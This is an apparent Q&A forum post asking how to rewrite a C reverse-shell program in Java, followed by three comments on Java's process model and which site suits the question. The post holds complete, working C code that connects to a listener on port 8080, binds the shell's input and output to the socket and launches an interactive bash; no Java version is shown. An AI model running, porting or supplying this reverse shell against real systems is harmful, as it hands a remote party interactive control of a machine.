# Simple Reverse-Shell-Script in java?

Tags: network, java, server, c, client

i have a simple script (**written in C**) and it connects back to a netcat server to open a shell, there, so a really simple reverse shell script. How to do the same in **java**?

```
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(void) {

 int sock = socket(AF_INET, SOCK_STREAM, 0);
 struct sockaddr_in serv_addr;
 serv_addr.sin_family = AF_INET;
 serv_addr.sin_port = htons(8080);
 serv_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
 if(0 != connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)))
    exit(0);
 dup2(sock, 2);
 dup2(sock, 1);
 dup2(sock, 0);

 execl("/bin/bash", "/bin/bash", "-i", NULL);
}
```

Comment: This cannot easily be done since Java does not have a mechanism to replace its own process image with a new one. However, this question should probably moved to http://stackoverflow.com/

Comment: @aventurin On Stack Overflow, this would be closed and downvoted into oblivion in 5 minutes. "How do I translate this code" is not a welcome question there.

Comment: That's true, on SO there's mess right now, it's good to move from SO to others rather than the opposite.